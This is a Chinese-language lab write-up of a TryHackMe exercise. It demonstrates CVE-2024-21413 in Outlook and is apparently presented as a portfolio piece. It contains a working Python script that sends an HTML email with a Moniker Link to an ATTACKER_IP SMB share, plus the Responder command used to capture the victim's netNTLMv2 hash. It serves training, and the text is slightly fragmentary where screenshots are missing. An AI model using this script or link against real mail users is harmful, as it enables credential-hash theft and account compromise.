CVE-2024-21413的概念验证漏洞利用,通过HTML电子邮件中的Moniker Link触发SMB连接,并借助Responder捕获netNTLMv2哈希。展示了渗透测试、Python脚本编写和网络协议分析技能。
概述: 一个实用的 PoC,演示如何在 HTML 邮件中使用 Moniker Link 触发 Outlook 发起 SMB 连接,从而通过 Responder 捕获受害者的 netNTLMv2 哈希。这展示了在渗透测试、脚本编写和网络协议分析方面的实践技能。
file://)的 HTML 邮件,该链接指向攻击者的 SMB 共享。# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124' # THM SMTP server
password = input('Enter attacker email password: ')
html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'
msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))
with smtplib.SMTP(mailserver, 25) as s:
s.ehlo()
s.login(sender, password)
s.sendmail(sender, [receiver], msg.as_string())
print('Email delivered')
提示: 在运行前替换 ATTACKER_IP 和 mailserver。在 TryHackMe 实验室中,密码是 attacker。
responder -I ens5
将 ens5 替换为你的网络接口名称。
/etc/resolv.conf 问题有时 Responder 会因 /etc/resolv.conf 中的符号链接损坏而失败。可通过以下命令修复:
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
重点技能: Linux 故障排查、DNS 配置,以及将工具适应到云/虚拟机环境。
错误 / resolv.conf 问题:`

DNS 修复已应用:

Python 邮件脚本:

漏洞利用投递:

受害者收件箱:

捕获的受害者哈希:

改编自 TryHackMe MonikerLink 实验室及 CMNatic 的原始 PoC(GitHub)